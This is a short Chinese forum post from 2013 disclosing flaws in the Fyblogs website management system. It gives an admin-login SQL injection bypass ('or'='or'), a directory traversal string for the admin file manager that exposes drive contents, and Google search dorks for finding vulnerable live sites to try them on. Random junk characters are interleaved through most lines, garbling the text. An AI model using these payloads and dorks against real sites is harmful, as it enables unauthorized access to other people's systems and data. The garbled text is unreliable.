漏洞类型: 未授权访问/权限绕过: Y8 x! m4 `+ }' l# i! {& Z
8 I9 N5 P' d( p8 X1 U简要描述:! t8 _( ^' K) L" h
4 J4 {& ]$ }: n V- [
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!8 H8 T- Y! I) B% o3 v9 R
8 ~3 y6 b! g: R4 a- {详细说明:
9 D3 Q) }% [( P% y% D; @) i( \- _2 A( M2 S1 H& _9 T
后台万能密码 'or'='or'. U# @" z! _, t$ U, m
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!! B. r6 U0 X, d
admin/uploadfile.asp?currentFolder=/upfiles/../
) Z& ^7 m3 ^/ A$ O: Q
8 |2 J$ l; S9 W X0 e2 k漏洞证明:
8 g# f8 Y4 Z+ ^, a
6 F* \( v. ?& Z' g谷歌:inurl:type.asp?id=1 新闻中心
/ M1 y3 o* Z) {2 W或者 :inurl:download_ok.asp?* M# Z2 }* B- b, s
' w- T% x* s. D; [+ ]# o6 o( A可以测试
( O' l ]* |- U4 O2 q) e% u4 J2 _2 {! G N9 g+ K
* H8 F$ p9 u, o0 m: x2 a
|
发表于 2013-3-7 13:07:46
收藏
支持
反对